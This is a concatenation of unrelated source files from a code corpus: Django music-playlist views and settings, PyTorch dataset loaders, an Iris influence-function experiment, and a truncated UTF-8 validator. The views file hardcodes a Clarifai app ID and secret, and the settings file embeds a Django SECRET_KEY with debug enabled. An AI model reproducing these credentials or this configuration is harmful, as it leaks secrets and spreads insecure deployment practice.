| no_license | HemantAHK/CMG | 3cf6c047b193e463e3632aa728cd49067e9dde76 | 7bec46d27e491397c4e13a52b34cf414a692d867 | refs/heads/master | 2021-05-29T20:01:04.390627 | 2013-08-15T15:24:22 | 2013-08-15T15:24:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from CMGTools.RootTools.RootTools import *
from ROOT import gSystem
gSystem.Load("libCMGToolsLEP3")
from ROOT import FourJetEpKinFitter
from ROOT import FourJetEpMKinFitter
from ROOT import DiJetMKinFitter
| [
""
]
| |
c0b9fba0df580154ea29be2dc724cbe802318450 | b8120b9a99b1aab3fa423bc28173b10523084301 | /app/views.py | 3980e892431891877c72c44e2da6ae5298a24185 | []
| no_license | Trailblazerr1/iiita-hacks-musify | e0cc22a95b164399462750e5667b886090ca17bb | d7ab39622306e48e280fb350b9f416b64dc95f37 | refs/heads/master | 2020-12-25T14:38:34.028923 | 2016-09-12T11:28:49 | 2016-09-12T11:28:49 | 67,906,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,195 | py | """
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
from app.forms import PostForm
from django.http import HttpResponseRedirect
from clarifai.client import ClarifaiApi
import requests
import json
import gensim
import os.path
BASE = os.path.dirname(os.path.abspath(__file__))
word_model = gensim.models.Word2Vec.load_word2vec_format(os.path.join(BASE, 'vectors.bin'),binary=True)
genres = ['abstract', 'accordion', 'afrikaans', 'afrobeat', 'ambient', 'andean', 'anime', 'axe', 'balearic', 'banda', 'bangla', 'barbershop', 'baroque', 'bassline', 'bebop', 'bemani', 'bhangra', 'bluegrass', 'blues', 'bolero', 'boogaloo', 'bounce', 'breakbeat', 'breaks', 'britpop', 'broadway', 'byzantine', 'cabaret', 'cajun', 'calypso', 'cantopop', 'capoeira', 'carnatic', 'ccm', 'cello', 'celtic', 'chanson', 'choral', 'choro', 'christmas', 'clarinet', 'classical', 'comedy', 'comic', 'commons', 'consort', 'corrosion', 'country', 'dancehall', 'demoscene', 'desi', 'didgeridoo', 'disco', 'dixieland', 'downtempo', 'drama', 'drone', 'dub', 'ebm', 'edm', 'electro', 'electronic', 'electronica', 'emo', 'environmental', 'eurovision', 'exotica', 'experimental', 'fado', 'fake', 'filmi', 'flamenco', 'folk', 'footwork', 'freestyle', 'funk', 'gabba', 'galego', 'gamelan', 'glitch', 'gospel', 'grime', 'grindcore', 'grunge', 'guidance', 'hardcore', 'harp', 'hawaiian', 'healing', 'hollywood', 'house', 'idol', 'industrial', 'jazz', 'jerk', 'judaica', 'juggalo', 'jungle', 'klezmer', 'latin', 'lds', 'lilith', 'liturgical', 'lounge', 'lowercase', 'maghreb', 'magyar', 'mallet', 'mambo', 'medieval', 'meditation', 'melancholia', 'merengue', 'metal', 'metalcore', 'minimal', 'mizrahi', 'monastic', 'morna', 'motivation', 'motown', 'neoclassical', 'nepali', 'neurofunk', 'ninja', 'noise', 'nursery', 'oi', 'opera', 'oratory', 'orchestral', 'outsider']
def home(request):
return render(request, 'app/home.html')
def Developers(request):
return render(request, 'app/Developers.html')
def playlist(request):
assert isinstance(request, HttpRequest)
if request.method == 'GET':
form = PostForm()
else:
form = PostForm(request.POST) # Bind data from request.POST into a PostForm
if form.is_valid():
imgURL = form.cleaned_data['content']
app_id = "DbZ4NzfrPL-K_CHHf4y4srnvBUSgMo4Dz9BIbeXt"
app_secret = "crjTy-8St_kiFkL0wZZCFyrcoWJyOdets8Fa1BNi"
clarifai_api = ClarifaiApi(app_id,app_secret)
tags = ''
embedLink = ''
try:
result = clarifai_api.tag_image_urls(imgURL)
except: #if url is invalid based on clarifai API call
tags = 'invalid url'
imgURL = ''
if tags!='invalid url':
tagList = result['results'][0]['result']['tag']['classes']
bestGenre = imgscore(tagList,genres)
r = requests.get('https://api.spotify.com/v1/search?q=%22'+bestGenre+'%22&type=playlist')
jsonStuff = r.json()
uri = jsonStuff['playlists']['items'][0]['uri']
embedLink = "https://embed.spotify.com/?uri="+uri
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': imgURL,
'debugText': tags,
'playlistURI': embedLink,
'year':datetime.now().year,
}
)
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': '',
'debugText': '',
'playlistURI': '',
'year':datetime.now().year,
}
)
def imgscore(words,genres):
l = 0.0
summ = []
for genre in genres:
for word in words:
try:
simScore = word_model.similarity(genre,word)
l += simScore
except:
pass
summ.append(l)
l = 0
return(genres[summ.index(max(summ))]) | [
"[email protected]"
]
| |
61496518c7782cbc99ab59bb0f240368c572137d | 6fda3d57556c381de407898710b02244561ffa4e | /load_datasets.py | c6bd1af889b12f860b070b4aeab2aaf412827bd7 | []
| no_license | pachecobeto95/Quality_POPEX | 46679f7319aff44675b3ec41be2a4551a611e3d4 | e98987c5ff8836723ef227c685dcd7d10363522b | refs/heads/master | 2023-03-31T04:11:29.868823 | 2021-04-03T19:17:35 | 2021-04-03T19:17:35 | 335,408,076 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,288 | py | import torch
import torchvision.transforms as transforms
from torchvision import datasets
from torch.utils.data import Dataset, DataLoader, random_split, SubsetRandomSampler
class LoadDataset():
def __init__(self, input_dim, batch_size_train, batch_size_test):
self.input_dim = input_dim
self.batch_size_train = batch_size_train
self.batch_size_test = batch_size_test
self.transformation_list = transforms.Compose([transforms.Resize(input_dim),
transforms.CenterCrop(input_dim),
transforms.ToTensor()])
def cifar_10(self):
# Load Cifar-10 dataset
root = "cifar_10"
trainset = datasets.CIFAR10(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR10(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def cifar_100(self):
# Load Cifar-100 dataset
root = "cifar_100"
trainset = datasets.CIFAR100(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR100(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def imageNet(self, root_path):
# Load ImageNet Dataset
test_dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
_, val_dataset = random_split(test_dataset, (0, 50000))
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
return None, val_loader
def caltech(self, root_path, split_train=0.8):
dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
train_size = int(split_train*len(dataset))
test_size = len(dataset) - train_size
train_dataset, test_dataset = random_split(dataset, (train_size, test_size))
train_dataset, val_dataset = random_split(train_dataset, (int(split_train*len(train_dataset)), len(train_dataset) - int(split_train*len(train_dataset))))
train_loader = DataLoader(dataset=train_dataset, shuffle=True, batch_size=self.batch_size_train)
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
test_loader = DataLoader(dataset=test_dataset, shuffle=False, batch_size=self.batch_size_test)
return train_loader, val_loader, test_loader | [
"[email protected]"
]
| |
07668772edfbe22ce75606f7b2dbddeeadeb083a | efcd8ea3f5419cd7d6eb7406875b7f727291492f | /IRIS/width_wise_l2/8w_l2.py | 46704866ad62a1cdd2b0e5d8b54f553a21f127d6 | [
"MIT"
]
| permissive | jrepifano/xai_is_fragile | 936612c2ecf7b020ab1a75719d18bff9bed564d2 | fd7e21355582543fa2d00bf9f48d3e12725c3fb6 | refs/heads/main | 2023-08-28T00:45:36.066073 | 2021-11-13T20:12:51 | 2021-11-13T20:12:51 | 346,057,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,542 | py | import os
import time
import torch
import numpy as np
from pyhessian import hessian
from sklearn.datasets import load_iris
from sklearn.metrics import accuracy_score
from scipy.stats import pearsonr, spearmanr
from sklearn.model_selection import LeaveOneOut
from sklearn.preprocessing import StandardScaler
os.environ["CUDA_DEVICE_ORDER"] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = '3'
# Random Seed - Negating the randomizing effect
np.random.seed(6)
# Seeds : 2, 5, 10, 13, 15, 20
# Random Seed for tensorflow
torch.manual_seed(14)
class Model(torch.nn.Module):
def __init__(self, n_feats, n_nodes, n_classes):
super(Model, self).__init__()
self.lin1 = torch.nn.Linear(n_feats, n_nodes)
self.lin_last = torch.nn.Linear(n_nodes, n_classes)
self.relu = torch.nn.SELU()
def forward(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
x = self.lin_last(x)
return x
def bottleneck(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
return x
def fit(self, x, y, no_epochs=1000):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3, weight_decay=0.005)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=100, verbose=False)
for epoch in range(no_epochs):
optimizer.zero_grad()
logits = self.forward(x)
loss = criterion(logits, y)
loss.backward()
optimizer.step()
scheduler.step(loss.item())
def score(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
logits = torch.nn.functional.softmax(self.forward(x), dim=1)
score = torch.sum(torch.argmax(logits, dim=1) == y)/len(x)
return score.cpu().numpy()
def get_indiv_loss(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss(reduction='none')
logits = self.forward(x)
loss = criterion(logits, y)
return [l.item() for l in loss] if len(loss) > 1 else loss.item()
class influence_wrapper:
def __init__(self, model, x_train, y_train, x_test=None, y_test=None):
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.model = model
self.device = 'cuda:0' if next(self.model.parameters()).is_cuda else 'cpu'
def get_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train[self.pointer].reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor([self.y_train[self.pointer]], device=self.device))
return loss
def get_train_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train)
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_train, device=self.device))
return loss
def get_test_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_test.reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_test, device=self.device))
return loss
def get_hessian(self, weights):
dim_1, dim_2 = weights.shape[0], weights.shape[1]
H_i = torch.zeros((dim_1, dim_2, dim_1, dim_2), device=self.device)
for i in range(len(self.x_train)):
self.pointer = i
H_i += torch.autograd.functional.hessian(self.get_loss, weights, vectorize=True)
H = H_i / len(self.x_train)
square_size = int(np.sqrt(torch.numel(H)))
H = H.view(square_size, square_size)
return H
def LiSSA(self, v, weights):
count = 0
cur_estimate = v
damping = 0
scale = 10
num_samples = len(self.x_train)
prev_norm = 1
diff = prev_norm
ihvp = None
for i in range(len(self.x_train)):
self.pointer = i
while diff > 0.00001 and count < 10000:
hvp = torch.autograd.functional.hvp(self.get_train_loss, weights, cur_estimate)[1]
cur_estimate = [a + (1 - damping) * b - c / scale for (a, b, c) in zip(v, cur_estimate, hvp)]
cur_estimate = torch.squeeze(torch.stack(cur_estimate)) # .view(1, -1)
numpy_est = cur_estimate.detach().cpu().numpy()
numpy_est = numpy_est.reshape(1, -1)
count += 1
diff = abs(np.linalg.norm(np.concatenate(numpy_est)) - prev_norm)
prev_norm = np.linalg.norm(np.concatenate(numpy_est))
if ihvp is None:
ihvp = [b/scale for b in cur_estimate]
else:
ihvp = [a + b/scale for (a, b) in zip(ihvp, cur_estimate)]
ihvp = torch.squeeze(torch.stack(ihvp))
ihvp = [a / num_samples for a in ihvp]
ihvp = torch.squeeze(torch.stack(ihvp))
return ihvp.detach()
def i_up_params(self, weights, idx, estimate=False):
i_up_params = list()
if estimate:
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_params.append(self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss, weights, grad)[1], weights).detach().cpu().numpy())
else:
H = self.get_hessian(self.model.lin_last.weight)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
orig_shape = grad.shape
i_up_params.append((H_inv @ grad.float().view(-1, 1)).view(orig_shape).detach().cpu().numpy())
return i_up_params
def i_up_loss(self, weights, idx, estimate=False):
i_up_loss = list()
test_grad = torch.autograd.grad(self.get_test_loss(weights), weights)[0]
if estimate:
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss,
weights, train_grad)[1], weights).view(-1, 1)).detach().cpu().numpy()[0][0])
else:
H = self.get_hessian(weights)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ (H_inv @ train_grad.float().view(-1, 1))).item())
return i_up_loss
def get_hessian_info(model, x, y):
device = 'cuda:0' if next(model.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
hessian_comp = hessian(model, criterion, data=(x, y), cuda=True)
top_eigenvalues, top_eigenvector = hessian_comp.eigenvalues()
return top_eigenvalues[-1]
def find_max_loss():
x, y = load_iris(return_X_y=True)
loo = LeaveOneOut()
train_acc, test_loss, y_pred = list(), list(), list()
for train_index, test_index in loo.split(x):
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train)
train_acc.append(model.score(x_train, y_train))
test_loss.append(model.get_indiv_loss(x_test, y_test))
y_pred.append(torch.argmax(torch.nn.functional.softmax(model(x_test), dim=1)).item())
train_acc = np.mean(train_acc)
test_acc = accuracy_score(y, y_pred)
max_loss = np.argmax(test_loss)
return max_loss, train_acc, test_acc
def find_top_train(max_loss=83):
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train, 60000)
train_acc = model.score(x_train, y_train)
train_loss = model.get_indiv_loss(x_train, y_train)
to_look = int(1/6 * len(x-1))
top_train = np.argsort(train_loss)[::-1][:to_look]
top_eig = get_hessian_info(model, x_train, y_train)
torch.save(model.state_dict(), 'loo_params_8w.pt')
return top_train, model, top_eig, train_acc
def exact_difference(model, top_train, max_loss):
exact_loss_diff = list()
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
true_loss = model.get_indiv_loss(x_test, y_test)
for i in top_train:
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
x_train, y_train = np.delete(x_train, i, 0), np.delete(y_train, i, 0)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.load_state_dict(torch.load('loo_params_8w.pt'))
model.fit(x_train, y_train, 7500)
exact_loss_diff.append(model.get_indiv_loss(x_test, y_test) - true_loss)
return exact_loss_diff
def approx_difference(model, top_train, max_loss):
model.load_state_dict(torch.load('loo_params_8w.pt'))
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
infl = influence_wrapper(model, x_train, y_train, x_test, y_test)
approx_loss_diff = np.asarray(infl.i_up_loss(model.lin_last.weight, top_train, estimate=False))
return approx_loss_diff
def main():
outer_start_time = time.time()
train, eig, pearson, spearman = list(), list(), list(), list()
for i in range(1):
start_time = time.time()
# max_loss, train_acc, test_acc = find_max_loss() # 83 is always the highest loss then 133, 70, 77
# print('Done max loss')
max_loss = 83
top_train, model, top_eig, train_acc = find_top_train(max_loss)
print('Done top train')
exact_loss_diff = exact_difference(model, top_train, max_loss)
print('Done Exact Diff')
approx_loss_diff = approx_difference(model, top_train, max_loss)
train.append(train_acc)
eig.append(top_eig)
pearson.append(pearsonr(exact_loss_diff, approx_loss_diff)[0])
spearman.append(spearmanr(exact_loss_diff, approx_loss_diff)[0])
print('Done {}/{} in {:.2f} minutes'.format(i+1, 10, (time.time()-start_time)/60))
if i % 10 == 0:
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
print('Finished Iter in {:.2f} minutes'.format((time.time()-outer_start_time)/60))
pass
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
7a883866c1dc23352c28cb30226f37e61c4eecf9 | 13884f547752c1f7d5b45d63a8e3aeebaea5a591 | /newsproject/newsproject/settings.py | 43da654da7fedf2f86c2779e0e66d4df147839d2 | []
| no_license | azharashra05/newsapp_repo | 5139a7d33767b43b83ebc255aa40f2ee6dc17efc | e487ae15f103aa3e0d7b4b405f1c6e2a729ffeb3 | refs/heads/master | 2022-12-10T21:07:49.371475 | 2020-09-05T07:57:28 | 2020-09-05T07:57:28 | 293,029,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | """
Django settings for newsproject project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR=os.path.join(BASE_DIR,'templates')
STATIC_DIR=os.path.join(BASE_DIR,'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ak9*^19hq5aeh9+i=v4#3vm7_@tce4i#bf5d!hfw_camqsz0re'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'newsapp'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'newsproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'newsproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
STATIC_DIR,
]
| [
"[email protected]"
]
| |
43a1a88455943cde239ee14c15fa12fc73f1c4f9 | 3cf5638a12bb6a03a40aaffcab15b1789546948d | /ws4py/utf8validator.py | b457768a61646dc7cb6de895077c599b37bfe646 | []
| no_license | GDur/LiveProcessingJs | 8afeed64777d1df977967856f2c8b592ff671438 | 7b2c5a0e4cee0926a8c289e297cdb470a7fe48b2 | refs/heads/master | 2016-09-06T07:55:21.240721 | 2012-12-08T11:14:19 | 2012-12-08T11:14:19 | 6,513,730 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,283 | py | # coding=utf-8
###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Note:
##
## This code is a Python implementation of the algorithm
##
## "Flexible and Economical UTF-8 Decoder"
##
## by Bjoern Hoehrmann
##
## [email protected]
## http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
class Utf8Validator:
   """
   Incremental UTF-8 validator with constant memory consumption (minimal state).
   Implements the algorithm "Flexible and Economical UTF-8 Decoder" by
   Bjoern Hoehrmann (http://bjoern.hoehrmann.de/utf-8/decoder/dfa/).

   State kept between calls:
     - state: current DFA state (UTF8_ACCEPT between complete code points)
     - codepoint: partially decoded code point (only meaningful mid-sequence)
     - i: total number of octets consumed across all validate() calls

   NOTE(review): written for Python 2 (validate() uses xrange); confirm the
   target interpreter before reuse.
   """
   ## DFA transitions. The first 256 entries map an input octet to its
   ## character class; the remaining entries encode state transitions
   ## (16 classes per state row).
   UTF8VALIDATOR_DFA = [
      0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 00..1f
      0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 20..3f
      0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 40..5f
      0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 60..7f
      1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, # 80..9f
      7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, # a0..bf
      8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, # c0..df
      0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, # e0..ef
      0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, # f0..ff
      0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, # s0..s0
      1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, # s1..s2
      1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, # s3..s4
      1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, # s5..s6
      1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, # s7..s8
   ]
   # Terminal DFA states: ACCEPT = a complete, valid sequence was consumed;
   # REJECT = the octet stream is invalid UTF-8.
   UTF8_ACCEPT = 0
   UTF8_REJECT = 1
   def __init__(self):
      self.reset()
   def decode(self, b):
      """
      Eat one UTF-8 octet, and validate on the fly.
      Returns UTF8_ACCEPT when enough octets have been consumed, in which case
      self.codepoint contains the decoded Unicode code point.
      Returns UTF8_REJECT when invalid UTF-8 was encountered.
      Returns some other positive integer when more octets need to be eaten.
      """
      # Look up the octet's character class.
      type = Utf8Validator.UTF8VALIDATOR_DFA[b]
      if self.state != Utf8Validator.UTF8_ACCEPT:
         # Continuation octet: shift in its low 6 payload bits.
         self.codepoint = (b & 0x3f) | (self.codepoint << 6)
      else:
         # Leading octet: the class determines how many payload bits it carries.
         self.codepoint = (0xff >> type) & b
      # Advance the DFA (16 classes per state row, rows start at offset 256).
      self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + self.state * 16 + type]
      return self.state
   def reset(self):
      """
      Reset validator to start new incremental UTF-8 decode/validation.
      """
      self.state = Utf8Validator.UTF8_ACCEPT
      self.codepoint = 0
      self.i = 0
   def validate(self, ba):
      """
      Incrementally validate a chunk of bytes provided as bytearray.
      Will return a quad (valid?, endsOnCodePoint?, currentIndex, totalIndex).
      As soon as an octet is encountered which renders the octet sequence
      invalid, a quad with valid? == False is returned. currentIndex returns
      the index within the currently consumed chunk, and totalIndex the
      index within the total consumed sequence that was the point of bail out.
      When valid? == True, currentIndex will be len(ba) and totalIndex the
      total amount of consumed bytes.
      """
      l = len(ba)
      for i in xrange(0, l):
         ## optimized version of decode(), since we are not interested in actual code points
         self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + (self.state << 4) + Utf8Validator.UTF8VALIDATOR_DFA[ba[i]]]
         if self.state == Utf8Validator.UTF8_REJECT:
            self.i += i
            return False, False, i, self.i
      self.i += l
      return True, self.state == Utf8Validator.UTF8_ACCEPT, l, self.i
# Global registry of test cases. Each entry is a pair
# [description, [(expected_valid, byte_string), ...]] filled by setTestSequences().
UTF8_TEST_SEQUENCES = []
def setTestSequences():
   """
   Setup test sequences for UTF-8 decoder tests from
   http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt

   Appends (expected_valid, bytes) pairs grouped by category into the
   module-level UTF8_TEST_SEQUENCES list. Section numbers in the comments
   below refer to Kuhn's UTF-8 stress-test document.
   """
   # 1 Some correct UTF-8 text
   vss = '\xce\xba\xe1\xbd\xb9\xcf\x83\xce\xbc\xce\xb5'
   vs = ["Some valid UTF-8 sequences", []]
   vs[1].append((True, vss))
   UTF8_TEST_SEQUENCES.append(vs)
   # All prefixes of correct UTF-8 text
   vs = ["All prefixes of a valid UTF-8 string that contains multi-byte code points", []]
   v = Utf8Validator()
   for i in xrange(1, len(vss) + 1):
      v.reset()
      res = v.validate(bytearray(vss[:i]))
      # A prefix is "valid" only if it is both well-formed and ends on a
      # code point boundary.
      vs[1].append((res[0] and res[1], vss[:i]))
   UTF8_TEST_SEQUENCES.append(vs)
   # 2.1 First possible sequence of a certain length
   vs = ["First possible sequence of a certain length", []]
   vs[1].append((True, '\x00'))
   vs[1].append((True, '\xc2\x80'))
   vs[1].append((True, '\xe0\xa0\x80'))
   vs[1].append((True, '\xf0\x90\x80\x80'))
